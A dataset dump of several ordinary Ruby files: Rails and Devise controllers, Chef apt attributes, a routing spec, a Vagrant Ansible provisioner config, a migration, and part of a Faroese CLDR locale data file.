hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
91cdd4fc4375acff754c3c15b07a8e9c07942c1d | 97 | # frozen_string_literal: true
# Read-only controller for user pages. The body of #show is intentionally
# empty; Rails presumably falls through to the action's default view — confirm
# a users/show template exists.
class UsersController < ApplicationController
  def show
  end
end
| 16.166667 | 45 | 0.814433 |
1d7e289d698122bf04cc04d3e3819b77fa8805b3 | 633 | class Admins::ConfirmationsController < Devise::ConfirmationsController
# NOTE(review): this controller currently adds no behavior — every action is
# inherited from Devise::ConfirmationsController. The commented-out methods
# below are the standard extension points left by the Devise generator;
# uncomment and customize as needed.
# GET /resource/confirmation/new
# def new
# super
# end
# POST /resource/confirmation
# def create
# super
# end
# GET /resource/confirmation?confirmation_token=abcdef
# def show
# super
# end
# protected
# The path used after resending confirmation instructions.
# def after_resending_confirmation_instructions_path_for(resource_name)
# super(resource_name)
# end
# The path used after confirmation.
# def after_confirmation_path_for(resource_name, resource)
# super(resource_name, resource)
# end
end
| 21.827586 | 73 | 0.729858 |
21364dbc111368f5e675cec68c30067238ffb597 | 1,477 | # vim: syntax=ruby:expandtab:shiftwidth=2:softtabstop=2:tabstop=2
#
# Copyright (c) 2016-present, Facebook, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Choose distribution-appropriate package mirrors. If the node is neither
# Debian nor Ubuntu, `mirror`/`security_mirror` remain nil (Ruby defines
# variables assigned in unexecuted branches), so the attributes below get nil.
if node.debian?
mirror = 'http://httpredir.debian.org/debian'
security_mirror = 'http://security.debian.org/'
elsif node.ubuntu?
mirror = 'http://archive.ubuntu.com/ubuntu'
security_mirror = 'http://security.ubuntu.com/ubuntu'
end
# Default attribute tree for the fb_apt cookbook.
default['fb_apt'] = {
'config' => {},
'repos' => [],
'keyserver' => 'keys.gnupg.net',
'mirror' => mirror,
'security_mirror' => security_mirror,
'preferences' => {},
'preserve_sources_list_d' => false,
# 86400 seconds — presumably a once-a-day apt update cadence; confirm.
'update_delay' => 86400,
'want_backports' => false,
'want_non_free' => false,
'want_source' => false,
'preserve_unknown_keyrings' => false,
'allow_modified_pkg_keyrings' => false,
}
# fb_apt must be defined for this to work...
# Each official key ID maps to nil; presumably the key material is resolved
# elsewhere (e.g. via the keyserver) — confirm against the fb_apt recipes.
keys = FB::Apt.get_official_keyids(node).map { |id| [id, nil] }.to_h
default['fb_apt']['keys'] = keys
| 32.822222 | 74 | 0.710223 |
112432a29ab96e23f2c0e131746ceaa0b411f4b5 | 94 | # frozen_string_literal: true
# Namespace stub for game 1848; the game's classes are defined elsewhere
# under this module.
module Engine
module Game
module G1848
end
end
end
| 10.444444 | 29 | 0.712766 |
3992b76a87acf92b0423f59dd27d54e7f72fa8e6 | 1,426 | # -*- encoding : utf-8 -*-
#coding: utf-8
#coding: utf-8
require "spec_helper"
# Routing specs for /distribution_lists CRUD actions.
# Modernized from the deprecated RSpec 2 `.should` monkey-patch syntax to the
# `expect(...).to` syntax required by RSpec 3+, and from hash rockets to
# Ruby 1.9+ symbol-key shorthand. Assertions are unchanged.
describe DistributionListsController do
  describe "routing" do
    it "recognizes and generates #index" do
      expect(get: "/distribution_lists").to route_to(controller: "distribution_lists", action: "index")
    end

    it "recognizes and generates #new" do
      expect(get: "/distribution_lists/new").to route_to(controller: "distribution_lists", action: "new")
    end

    it "recognizes and generates #show" do
      expect(get: "/distribution_lists/1").to route_to(controller: "distribution_lists", action: "show", id: "1")
    end

    it "recognizes and generates #edit" do
      expect(get: "/distribution_lists/1/edit").to route_to(controller: "distribution_lists", action: "edit", id: "1")
    end

    it "recognizes and generates #create" do
      expect(post: "/distribution_lists").to route_to(controller: "distribution_lists", action: "create")
    end

    it "recognizes and generates #update" do
      expect(put: "/distribution_lists/1").to route_to(controller: "distribution_lists", action: "update", id: "1")
    end

    it "recognizes and generates #destroy" do
      expect(delete: "/distribution_lists/1").to route_to(controller: "distribution_lists", action: "destroy", id: "1")
    end
  end
end
| 35.65 | 132 | 0.626227 |
79ddcce30032161895e556460631ac2644ad2d15 | 4,426 | module VagrantPlugins
module Ansible
class Config < Vagrant.plugin("2", :config)
attr_accessor :playbook
attr_accessor :extra_vars
attr_accessor :inventory_path
attr_accessor :ask_sudo_pass
attr_accessor :limit
attr_accessor :sudo
attr_accessor :sudo_user
attr_accessor :verbose
attr_accessor :tags
attr_accessor :skip_tags
attr_accessor :start_at_task
attr_accessor :groups
attr_accessor :host_key_checking
# Joker attribute, used to pass unsupported arguments to ansible-playbook anyway
attr_accessor :raw_arguments
# Joker attribute, used to set additional SSH parameters for ansible-playbook anyway
attr_accessor :raw_ssh_args
# Seed every configuration attribute with the UNSET_VALUE sentinel so that
# finalize! can later distinguish "never set by the user" from a real value.
def initialize
  %i[
    playbook extra_vars inventory_path ask_sudo_pass limit sudo sudo_user
    verbose tags skip_tags start_at_task groups host_key_checking
    raw_arguments raw_ssh_args
  ].each do |attr|
    instance_variable_set(:"@#{attr}", UNSET_VALUE)
  end
end
# Resolve the UNSET_VALUE sentinels into concrete defaults. Most attributes
# default to nil; boolean flags are coerced strictly (anything other than
# literal true becomes false), and groups defaults to an empty hash.
def finalize!
  %i[
    playbook extra_vars inventory_path limit sudo_user verbose tags
    skip_tags start_at_task raw_arguments raw_ssh_args
  ].each do |attr|
    ivar = :"@#{attr}"
    instance_variable_set(ivar, nil) if instance_variable_get(ivar) == UNSET_VALUE
  end
  @ask_sudo_pass     = false unless @ask_sudo_pass == true
  @sudo              = false unless @sudo == true
  @host_key_checking = false unless @host_key_checking == true
  @groups            = {} if @groups == UNSET_VALUE
end
# Validates the provisioner configuration against a machine.
# Checks: playbook is present and exists on the host; extra_vars is a Hash or
# a path to an existing file; inventory_path (if given) exists. Side effect:
# normalizes a String extra_vars to ansible-playbook's "@path" form.
# @param machine [Vagrant::Machine] machine whose root_path anchors relative paths
# @return [Hash] error map: { "ansible provisioner" => [messages] }
def validate(machine)
errors = _detected_errors
# Validate that a playbook path was provided
if !playbook
errors << I18n.t("vagrant.provisioners.ansible.no_playbook")
end
# Validate the existence of said playbook on the host
if playbook
expanded_path = Pathname.new(playbook).expand_path(machine.env.root_path)
if !expanded_path.file?
errors << I18n.t("vagrant.provisioners.ansible.playbook_path_invalid",
:path => expanded_path)
end
end
# Validate that extra_vars is either a hash, or a path to an
# existing file
if extra_vars
extra_vars_is_valid = extra_vars.kind_of?(Hash) || extra_vars.kind_of?(String)
if extra_vars.kind_of?(String)
# Accept the usage of '@' prefix in Vagrantfile (e.g. '@vars.yml'
# and 'vars.yml' are both supported)
match_data = /^@?(.+)$/.match(extra_vars)
extra_vars_path = match_data[1].to_s
expanded_path = Pathname.new(extra_vars_path).expand_path(machine.env.root_path)
extra_vars_is_valid = expanded_path.exist?
if extra_vars_is_valid
# Normalize to the '@file' form expected by ansible-playbook.
@extra_vars = '@' + extra_vars_path
end
end
if !extra_vars_is_valid
errors << I18n.t("vagrant.provisioners.ansible.extra_vars_invalid",
:type => extra_vars.class.to_s,
:value => extra_vars.to_s
)
end
end
# Validate the existence of the inventory_path, if specified
if inventory_path
expanded_path = Pathname.new(inventory_path).expand_path(machine.env.root_path)
if !expanded_path.exist?
errors << I18n.t("vagrant.provisioners.ansible.inventory_path_invalid",
:path => expanded_path)
end
end
{ "ansible provisioner" => errors }
end
end
end
end
| 38.824561 | 92 | 0.585178 |
7a91885464e58e8ec66bea3363625a6e55684cf5 | 207 | class AddObjectTypeToSpaceEvents < ActiveRecord::Migration
# Adds two required integer columns to space_events: object_type and role.
def change
  %i[object_type role].each do |column|
    add_column :space_events, column, :integer, null: false
  end
end
end
| 29.571429 | 65 | 0.763285 |
62a5eedc9bcf74e419d16273626d470ef6b5412f | 23,974 | #
# a language data file for Ruby/CLDR
#
# Generated by: CLDR::Generator
#
# CLDR version: 1.3
#
# Original file name: common/main/fo.xml
# Original file revision: 1.26 $
#
# Copyright (C) 2006 Masao Mutoh
#
# This file is distributed under the same license as the Ruby/CLDR.
#
private
def init_data
@localized_pattern_characters = "GyMdkHmsSEDFwWahKzYeugAZ"
@default = "gregorian"
@months = {}
@months[:gregorian] = {}
@months[:gregorian][:abbreviated] = {}
@months[:gregorian][:abbreviated]["1"] = "jan"
@months[:gregorian][:abbreviated]["10"] = "okt"
@months[:gregorian][:abbreviated]["11"] = "nov"
@months[:gregorian][:abbreviated]["12"] = "des"
@months[:gregorian][:abbreviated]["2"] = "feb"
@months[:gregorian][:abbreviated]["3"] = "mar"
@months[:gregorian][:abbreviated]["4"] = "apr"
@months[:gregorian][:abbreviated]["5"] = "mai"
@months[:gregorian][:abbreviated]["6"] = "jun"
@months[:gregorian][:abbreviated]["7"] = "jul"
@months[:gregorian][:abbreviated]["8"] = "aug"
@months[:gregorian][:abbreviated]["9"] = "sep"
@months[:gregorian][:narrow] = {}
@months[:gregorian][:narrow]["1"] = "1"
@months[:gregorian][:narrow]["10"] = "10"
@months[:gregorian][:narrow]["11"] = "11"
@months[:gregorian][:narrow]["12"] = "12"
@months[:gregorian][:narrow]["2"] = "2"
@months[:gregorian][:narrow]["3"] = "3"
@months[:gregorian][:narrow]["4"] = "4"
@months[:gregorian][:narrow]["5"] = "5"
@months[:gregorian][:narrow]["6"] = "6"
@months[:gregorian][:narrow]["7"] = "7"
@months[:gregorian][:narrow]["8"] = "8"
@months[:gregorian][:narrow]["9"] = "9"
@months[:gregorian][:wide] = {}
@months[:gregorian][:wide]["1"] = "januar"
@months[:gregorian][:wide]["10"] = "oktober"
@months[:gregorian][:wide]["11"] = "november"
@months[:gregorian][:wide]["12"] = "desember"
@months[:gregorian][:wide]["2"] = "februar"
@months[:gregorian][:wide]["3"] = "mars"
@months[:gregorian][:wide]["4"] = "apríl"
@months[:gregorian][:wide]["5"] = "mai"
@months[:gregorian][:wide]["6"] = "juni"
@months[:gregorian][:wide]["7"] = "juli"
@months[:gregorian][:wide]["8"] = "august"
@months[:gregorian][:wide]["9"] = "september"
@months[:hebrew] = {}
@months[:hebrew][:abbreviated] = {}
@months[:hebrew][:abbreviated]["1"] = "Tishri"
@months[:hebrew][:abbreviated]["10"] = "Sivan"
@months[:hebrew][:abbreviated]["11"] = "Tamuz"
@months[:hebrew][:abbreviated]["12"] = "Av"
@months[:hebrew][:abbreviated]["13"] = "Elul"
@months[:hebrew][:abbreviated]["2"] = "Heshvan"
@months[:hebrew][:abbreviated]["3"] = "Kislev"
@months[:hebrew][:abbreviated]["4"] = "Tevet"
@months[:hebrew][:abbreviated]["5"] = "Shevat"
@months[:hebrew][:abbreviated]["6"] = "Adar I"
@months[:hebrew][:abbreviated]["7"] = "Adar"
@months[:hebrew][:abbreviated]["8"] = "Nisan"
@months[:hebrew][:abbreviated]["9"] = "Iyar"
@months[:hebrew][:wide] = {}
@months[:hebrew][:wide]["1"] = "Tishri"
@months[:hebrew][:wide]["10"] = "Sivan"
@months[:hebrew][:wide]["11"] = "Tamuz"
@months[:hebrew][:wide]["12"] = "Av"
@months[:hebrew][:wide]["13"] = "Elul"
@months[:hebrew][:wide]["2"] = "Heshvan"
@months[:hebrew][:wide]["3"] = "Kislev"
@months[:hebrew][:wide]["4"] = "Tevet"
@months[:hebrew][:wide]["5"] = "Shevat"
@months[:hebrew][:wide]["6"] = "Adar I"
@months[:hebrew][:wide]["7"] = "Adar"
@months[:hebrew][:wide]["8"] = "Nisan"
@months[:hebrew][:wide]["9"] = "Iyar"
@months[:islamic_civil] = {}
@months[:islamic_civil][:abbreviated] = {}
@months[:islamic_civil][:abbreviated]["1"] = "Muharram"
@months[:islamic_civil][:abbreviated]["10"] = "Shawwal"
@months[:islamic_civil][:abbreviated]["11"] = "Dhuʻl-Qiʻdah"
@months[:islamic_civil][:abbreviated]["12"] = "Dhuʻl-Hijjah"
@months[:islamic_civil][:abbreviated]["2"] = "Safar"
@months[:islamic_civil][:abbreviated]["3"] = "Rabiʻ I"
@months[:islamic_civil][:abbreviated]["4"] = "Rabiʻ II"
@months[:islamic_civil][:abbreviated]["5"] = "Jumada I"
@months[:islamic_civil][:abbreviated]["6"] = "Jumada II"
@months[:islamic_civil][:abbreviated]["7"] = "Rajab"
@months[:islamic_civil][:abbreviated]["8"] = "Shaʻban"
@months[:islamic_civil][:abbreviated]["9"] = "Ramadan"
@months[:islamic_civil][:wide] = {}
@months[:islamic_civil][:wide]["1"] = "Muharram"
@months[:islamic_civil][:wide]["10"] = "Shawwal"
@months[:islamic_civil][:wide]["11"] = "Dhuʻl-Qiʻdah"
@months[:islamic_civil][:wide]["12"] = "Dhuʻl-Hijjah"
@months[:islamic_civil][:wide]["2"] = "Safar"
@months[:islamic_civil][:wide]["3"] = "Rabiʻ I"
@months[:islamic_civil][:wide]["4"] = "Rabiʻ II"
@months[:islamic_civil][:wide]["5"] = "Jumada I"
@months[:islamic_civil][:wide]["6"] = "Jumada II"
@months[:islamic_civil][:wide]["7"] = "Rajab"
@months[:islamic_civil][:wide]["8"] = "Shaʻban"
@months[:islamic_civil][:wide]["9"] = "Ramadan"
@months[:islamic] = {}
@months[:islamic][:abbreviated] = {}
@months[:islamic][:abbreviated]["1"] = "Muharram"
@months[:islamic][:abbreviated]["10"] = "Shawwal"
@months[:islamic][:abbreviated]["11"] = "Dhuʻl-Qiʻdah"
@months[:islamic][:abbreviated]["12"] = "Dhuʻl-Hijjah"
@months[:islamic][:abbreviated]["2"] = "Safar"
@months[:islamic][:abbreviated]["3"] = "Rabiʻ I"
@months[:islamic][:abbreviated]["4"] = "Rabiʻ II"
@months[:islamic][:abbreviated]["5"] = "Jumada I"
@months[:islamic][:abbreviated]["6"] = "Jumada II"
@months[:islamic][:abbreviated]["7"] = "Rajab"
@months[:islamic][:abbreviated]["8"] = "Shaʻban"
@months[:islamic][:abbreviated]["9"] = "Ramadan"
@months[:islamic][:wide] = {}
@months[:islamic][:wide]["1"] = "Muharram"
@months[:islamic][:wide]["10"] = "Shawwal"
@months[:islamic][:wide]["11"] = "Dhuʻl-Qiʻdah"
@months[:islamic][:wide]["12"] = "Dhuʻl-Hijjah"
@months[:islamic][:wide]["2"] = "Safar"
@months[:islamic][:wide]["3"] = "Rabiʻ I"
@months[:islamic][:wide]["4"] = "Rabiʻ II"
@months[:islamic][:wide]["5"] = "Jumada I"
@months[:islamic][:wide]["6"] = "Jumada II"
@months[:islamic][:wide]["7"] = "Rajab"
@months[:islamic][:wide]["8"] = "Shaʻban"
@months[:islamic][:wide]["9"] = "Ramadan"
@months[:persian] = {}
@months[:persian][:abbreviated] = {}
@months[:persian][:abbreviated]["1"] = "Farvardin"
@months[:persian][:abbreviated]["10"] = "Dey"
@months[:persian][:abbreviated]["11"] = "Bahman"
@months[:persian][:abbreviated]["12"] = "Esfand"
@months[:persian][:abbreviated]["2"] = "Ordibehesht"
@months[:persian][:abbreviated]["3"] = "Khordad"
@months[:persian][:abbreviated]["4"] = "Tir"
@months[:persian][:abbreviated]["5"] = "Mordad"
@months[:persian][:abbreviated]["6"] = "Shahrivar"
@months[:persian][:abbreviated]["7"] = "Mehr"
@months[:persian][:abbreviated]["8"] = "Aban"
@months[:persian][:abbreviated]["9"] = "Azar"
@months[:persian][:wide] = {}
@months[:persian][:wide]["1"] = "Farvardin"
@months[:persian][:wide]["10"] = "Dey"
@months[:persian][:wide]["11"] = "Bahman"
@months[:persian][:wide]["12"] = "Esfand"
@months[:persian][:wide]["2"] = "Ordibehesht"
@months[:persian][:wide]["3"] = "Khordad"
@months[:persian][:wide]["4"] = "Tir"
@months[:persian][:wide]["5"] = "Mordad"
@months[:persian][:wide]["6"] = "Shahrivar"
@months[:persian][:wide]["7"] = "Mehr"
@months[:persian][:wide]["8"] = "Aban"
@months[:persian][:wide]["9"] = "Azar"
@monthformat_defaults = {}
@monthformat_defaults["gregorian"] = "wide"
@monthformat_defaults["hebrew"] = "wide"
@monthformat_defaults["islamic"] = "wide"
@monthformat_defaults["islamic-civil"] = "wide"
@monthformat_defaults["persian"] = "wide"
@days = {}
@days[:gregorian] = {}
@days[:gregorian][:abbreviated] = {}
@days[:gregorian][:abbreviated]["fri"] = "frí"
@days[:gregorian][:abbreviated]["mon"] = "mán"
@days[:gregorian][:abbreviated]["sat"] = "ley"
@days[:gregorian][:abbreviated]["sun"] = "sun"
@days[:gregorian][:abbreviated]["thu"] = "hós"
@days[:gregorian][:abbreviated]["tue"] = "týs"
@days[:gregorian][:abbreviated]["wed"] = "mik"
@days[:gregorian][:narrow] = {}
@days[:gregorian][:narrow]["fri"] = "6"
@days[:gregorian][:narrow]["mon"] = "2"
@days[:gregorian][:narrow]["sat"] = "7"
@days[:gregorian][:narrow]["sun"] = "1"
@days[:gregorian][:narrow]["thu"] = "5"
@days[:gregorian][:narrow]["tue"] = "3"
@days[:gregorian][:narrow]["wed"] = "4"
@days[:gregorian][:wide] = {}
@days[:gregorian][:wide]["fri"] = "fríggjadagur"
@days[:gregorian][:wide]["mon"] = "mánadagur"
@days[:gregorian][:wide]["sat"] = "leygardagur"
@days[:gregorian][:wide]["sun"] = "sunnudagur"
@days[:gregorian][:wide]["thu"] = "hósdagur"
@days[:gregorian][:wide]["tue"] = "týsdagur"
@days[:gregorian][:wide]["wed"] = "mikudagur"
@dayformat_defaults = {}
@dayformat_defaults["gregorian"] = "wide"
@week_firstdays = {}
@week_firstdays["gregorian"] = "sun"
@weekend_starts = {}
@weekend_starts["gregorian"] = "sat"
@weekend_ends = {}
@weekend_ends["gregorian"] = "sun"
@mindays = {}
@mindays["gregorian"] = "1"
@am = {}
@am["gregorian"] = "AM"
@pm = {}
@pm["gregorian"] = "PM"
@era_names = {}
@era_abbrs = {}
@era_abbrs[:buddhist] = {}
@era_abbrs[:buddhist]["0"] = "BE"
@era_abbrs[:gregorian] = {}
@era_abbrs[:gregorian]["0"] = "BCE"
@era_abbrs[:gregorian]["1"] = "CE"
@era_abbrs[:hebrew] = {}
@era_abbrs[:hebrew]["0"] = "AM"
@era_abbrs[:islamic_civil] = {}
@era_abbrs[:islamic_civil]["0"] = "AH"
@era_abbrs[:islamic] = {}
@era_abbrs[:islamic]["0"] = "AH"
@era_abbrs[:japanese] = {}
@era_abbrs[:japanese]["0"] = "Taika"
@era_abbrs[:japanese]["1"] = "Hakuchi"
@era_abbrs[:japanese]["10"] = "Tempyō"
@era_abbrs[:japanese]["100"] = "Kaō"
@era_abbrs[:japanese]["101"] = "Shōan"
@era_abbrs[:japanese]["102"] = "Angen"
@era_abbrs[:japanese]["103"] = "Jishō"
@era_abbrs[:japanese]["104"] = "Yōwa"
@era_abbrs[:japanese]["105"] = "Juei"
@era_abbrs[:japanese]["106"] = "Genryuku"
@era_abbrs[:japanese]["107"] = "Bunji"
@era_abbrs[:japanese]["108"] = "Kenkyū"
@era_abbrs[:japanese]["109"] = "Shōji"
@era_abbrs[:japanese]["11"] = "Tempyō-kampō"
@era_abbrs[:japanese]["110"] = "Kennin"
@era_abbrs[:japanese]["111"] = "Genkyū"
@era_abbrs[:japanese]["112"] = "Ken-ei"
@era_abbrs[:japanese]["113"] = "Shōgen"
@era_abbrs[:japanese]["114"] = "Kenryaku"
@era_abbrs[:japanese]["115"] = "Kenpō"
@era_abbrs[:japanese]["116"] = "Shōkyū"
@era_abbrs[:japanese]["117"] = "Jōō"
@era_abbrs[:japanese]["118"] = "Gennin"
@era_abbrs[:japanese]["119"] = "Karoku"
@era_abbrs[:japanese]["12"] = "Tempyō-shōhō"
@era_abbrs[:japanese]["120"] = "Antei"
@era_abbrs[:japanese]["121"] = "Kanki"
@era_abbrs[:japanese]["122"] = "Jōei"
@era_abbrs[:japanese]["123"] = "Tempuku"
@era_abbrs[:japanese]["124"] = "Bunryaku"
@era_abbrs[:japanese]["125"] = "Katei"
@era_abbrs[:japanese]["126"] = "Ryakunin"
@era_abbrs[:japanese]["127"] = "En-ō"
@era_abbrs[:japanese]["128"] = "Ninji"
@era_abbrs[:japanese]["129"] = "Kangen"
@era_abbrs[:japanese]["13"] = "Tempyō-hōji"
@era_abbrs[:japanese]["130"] = "Hōji"
@era_abbrs[:japanese]["131"] = "Kenchō"
@era_abbrs[:japanese]["132"] = "Kōgen"
@era_abbrs[:japanese]["133"] = "Shōka"
@era_abbrs[:japanese]["134"] = "Shōgen"
@era_abbrs[:japanese]["135"] = "Bun-ō"
@era_abbrs[:japanese]["136"] = "Kōchō"
@era_abbrs[:japanese]["137"] = "Bun-ei"
@era_abbrs[:japanese]["138"] = "Kenji"
@era_abbrs[:japanese]["139"] = "Kōan"
@era_abbrs[:japanese]["14"] = "Temphō-jingo"
@era_abbrs[:japanese]["140"] = "Shōō"
@era_abbrs[:japanese]["141"] = "Einin"
@era_abbrs[:japanese]["142"] = "Shōan"
@era_abbrs[:japanese]["143"] = "Kengen"
@era_abbrs[:japanese]["144"] = "Kagen"
@era_abbrs[:japanese]["145"] = "Tokuji"
@era_abbrs[:japanese]["146"] = "Enkei"
@era_abbrs[:japanese]["147"] = "Ōchō"
@era_abbrs[:japanese]["148"] = "Shōwa"
@era_abbrs[:japanese]["149"] = "Bunpō"
@era_abbrs[:japanese]["15"] = "Jingo-keiun"
@era_abbrs[:japanese]["150"] = "Genō"
@era_abbrs[:japanese]["151"] = "Genkyō"
@era_abbrs[:japanese]["152"] = "Shōchū"
@era_abbrs[:japanese]["153"] = "Kareki"
@era_abbrs[:japanese]["154"] = "Gentoku"
@era_abbrs[:japanese]["155"] = "Genkō"
@era_abbrs[:japanese]["156"] = "Kemmu"
@era_abbrs[:japanese]["157"] = "Engen"
@era_abbrs[:japanese]["158"] = "Kōkoku"
@era_abbrs[:japanese]["159"] = "Shōhei"
@era_abbrs[:japanese]["16"] = "Hōki"
@era_abbrs[:japanese]["160"] = "Kentoku"
@era_abbrs[:japanese]["161"] = "Bunchũ"
@era_abbrs[:japanese]["162"] = "Tenju"
@era_abbrs[:japanese]["163"] = "Kōryaku"
@era_abbrs[:japanese]["164"] = "Kōwa"
@era_abbrs[:japanese]["165"] = "Genchũ"
@era_abbrs[:japanese]["166"] = "Meitoku"
@era_abbrs[:japanese]["167"] = "Kakei"
@era_abbrs[:japanese]["168"] = "Kōō"
@era_abbrs[:japanese]["169"] = "Meitoku"
@era_abbrs[:japanese]["17"] = "Ten-ō"
@era_abbrs[:japanese]["170"] = "Ōei"
@era_abbrs[:japanese]["171"] = "Shōchō"
@era_abbrs[:japanese]["172"] = "Eikyō"
@era_abbrs[:japanese]["173"] = "Kakitsu"
@era_abbrs[:japanese]["174"] = "Bun-an"
@era_abbrs[:japanese]["175"] = "Hōtoku"
@era_abbrs[:japanese]["176"] = "Kyōtoku"
@era_abbrs[:japanese]["177"] = "Kōshō"
@era_abbrs[:japanese]["178"] = "Chōroku"
@era_abbrs[:japanese]["179"] = "Kanshō"
@era_abbrs[:japanese]["18"] = "Enryaku"
@era_abbrs[:japanese]["180"] = "Bunshō"
@era_abbrs[:japanese]["181"] = "Ōnin"
@era_abbrs[:japanese]["182"] = "Bunmei"
@era_abbrs[:japanese]["183"] = "Chōkyō"
@era_abbrs[:japanese]["184"] = "Entoku"
@era_abbrs[:japanese]["185"] = "Meiō"
@era_abbrs[:japanese]["186"] = "Bunki"
@era_abbrs[:japanese]["187"] = "Eishō"
@era_abbrs[:japanese]["188"] = "Taiei"
@era_abbrs[:japanese]["189"] = "Kyōroku"
@era_abbrs[:japanese]["19"] = "Daidō"
@era_abbrs[:japanese]["190"] = "Tenmon"
@era_abbrs[:japanese]["191"] = "Kōji"
@era_abbrs[:japanese]["192"] = "Eiroku"
@era_abbrs[:japanese]["193"] = "Genki"
@era_abbrs[:japanese]["194"] = "Tenshō"
@era_abbrs[:japanese]["195"] = "Bunroku"
@era_abbrs[:japanese]["196"] = "Keichō"
@era_abbrs[:japanese]["197"] = "Genwa"
@era_abbrs[:japanese]["198"] = "Kan-ei"
@era_abbrs[:japanese]["199"] = "Shōho"
@era_abbrs[:japanese]["2"] = "Hakuhō"
@era_abbrs[:japanese]["20"] = "Kōnin"
@era_abbrs[:japanese]["200"] = "Keian"
@era_abbrs[:japanese]["201"] = "Shōō"
@era_abbrs[:japanese]["202"] = "Meiryaku"
@era_abbrs[:japanese]["203"] = "Manji"
@era_abbrs[:japanese]["204"] = "Kanbun"
@era_abbrs[:japanese]["205"] = "Enpō"
@era_abbrs[:japanese]["206"] = "Tenwa"
@era_abbrs[:japanese]["207"] = "Jōkyō"
@era_abbrs[:japanese]["208"] = "Genroku"
@era_abbrs[:japanese]["209"] = "Hōei"
@era_abbrs[:japanese]["21"] = "Tenchō"
@era_abbrs[:japanese]["210"] = "Shōtoku"
@era_abbrs[:japanese]["211"] = "Kyōhō"
@era_abbrs[:japanese]["212"] = "Genbun"
@era_abbrs[:japanese]["213"] = "Kanpō"
@era_abbrs[:japanese]["214"] = "Enkyō"
@era_abbrs[:japanese]["215"] = "Kan-en"
@era_abbrs[:japanese]["216"] = "Hōryaku"
@era_abbrs[:japanese]["217"] = "Meiwa"
@era_abbrs[:japanese]["218"] = "An-ei"
@era_abbrs[:japanese]["219"] = "Tenmei"
@era_abbrs[:japanese]["22"] = "Shōwa"
@era_abbrs[:japanese]["220"] = "Kansei"
@era_abbrs[:japanese]["221"] = "Kyōwa"
@era_abbrs[:japanese]["222"] = "Bunka"
@era_abbrs[:japanese]["223"] = "Bunsei"
@era_abbrs[:japanese]["224"] = "Tenpō"
@era_abbrs[:japanese]["225"] = "Kōka"
@era_abbrs[:japanese]["226"] = "Kaei"
@era_abbrs[:japanese]["227"] = "Ansei"
@era_abbrs[:japanese]["228"] = "Man-en"
@era_abbrs[:japanese]["229"] = "Bunkyū"
@era_abbrs[:japanese]["23"] = "Kajō"
@era_abbrs[:japanese]["230"] = "Genji"
@era_abbrs[:japanese]["231"] = "Keiō"
@era_abbrs[:japanese]["232"] = "Meiji"
@era_abbrs[:japanese]["233"] = "Taishō"
@era_abbrs[:japanese]["234"] = "Shōwa"
@era_abbrs[:japanese]["235"] = "Heisei"
@era_abbrs[:japanese]["24"] = "Ninju"
@era_abbrs[:japanese]["25"] = "Saiko"
@era_abbrs[:japanese]["26"] = "Tennan"
@era_abbrs[:japanese]["27"] = "Jōgan"
@era_abbrs[:japanese]["28"] = "Genkei"
@era_abbrs[:japanese]["29"] = "Ninna"
@era_abbrs[:japanese]["3"] = "Shuchō"
@era_abbrs[:japanese]["30"] = "Kampyō"
@era_abbrs[:japanese]["31"] = "Shōtai"
@era_abbrs[:japanese]["32"] = "Engi"
@era_abbrs[:japanese]["33"] = "Enchō"
@era_abbrs[:japanese]["34"] = "Shōhei"
@era_abbrs[:japanese]["35"] = "Tengyō"
@era_abbrs[:japanese]["36"] = "Tenryaku"
@era_abbrs[:japanese]["37"] = "Tentoku"
@era_abbrs[:japanese]["38"] = "Ōwa"
@era_abbrs[:japanese]["39"] = "Kōhō"
@era_abbrs[:japanese]["4"] = "Taihō"
@era_abbrs[:japanese]["40"] = "Anna"
@era_abbrs[:japanese]["41"] = "Tenroku"
@era_abbrs[:japanese]["42"] = "Ten-en"
@era_abbrs[:japanese]["43"] = "Jōgen"
@era_abbrs[:japanese]["44"] = "Tengen"
@era_abbrs[:japanese]["45"] = "Eikan"
@era_abbrs[:japanese]["46"] = "Kanna"
@era_abbrs[:japanese]["47"] = "Ei-en"
@era_abbrs[:japanese]["48"] = "Eiso"
@era_abbrs[:japanese]["49"] = "Shōryaku"
@era_abbrs[:japanese]["5"] = "Keiun"
@era_abbrs[:japanese]["50"] = "Chōtoku"
@era_abbrs[:japanese]["51"] = "Chōhō"
@era_abbrs[:japanese]["52"] = "Kankō"
@era_abbrs[:japanese]["53"] = "Chōwa"
@era_abbrs[:japanese]["54"] = "Kannin"
@era_abbrs[:japanese]["55"] = "Jian"
@era_abbrs[:japanese]["56"] = "Manju"
@era_abbrs[:japanese]["57"] = "Chōgen"
@era_abbrs[:japanese]["58"] = "Chōryaku"
@era_abbrs[:japanese]["59"] = "Chōkyū"
@era_abbrs[:japanese]["6"] = "Wadō"
@era_abbrs[:japanese]["60"] = "Kantoku"
@era_abbrs[:japanese]["61"] = "Eishō"
@era_abbrs[:japanese]["62"] = "Tengi"
@era_abbrs[:japanese]["63"] = "Kōhei"
@era_abbrs[:japanese]["64"] = "Jiryaku"
@era_abbrs[:japanese]["65"] = "Enkyū"
@era_abbrs[:japanese]["66"] = "Shōho"
@era_abbrs[:japanese]["67"] = "Shōryaku"
@era_abbrs[:japanese]["68"] = "Eiho"
@era_abbrs[:japanese]["69"] = "Ōtoku"
@era_abbrs[:japanese]["7"] = "Reiki"
@era_abbrs[:japanese]["70"] = "Kanji"
@era_abbrs[:japanese]["71"] = "Kaho"
@era_abbrs[:japanese]["72"] = "Eichō"
@era_abbrs[:japanese]["73"] = "Shōtoku"
@era_abbrs[:japanese]["74"] = "Kōwa"
@era_abbrs[:japanese]["75"] = "Chōji"
@era_abbrs[:japanese]["76"] = "Kashō"
@era_abbrs[:japanese]["77"] = "Tennin"
@era_abbrs[:japanese]["78"] = "Ten-ei"
@era_abbrs[:japanese]["79"] = "Eikyū"
@era_abbrs[:japanese]["8"] = "Yōrō"
@era_abbrs[:japanese]["80"] = "Gen-ei"
@era_abbrs[:japanese]["81"] = "Hoan"
@era_abbrs[:japanese]["82"] = "Tenji"
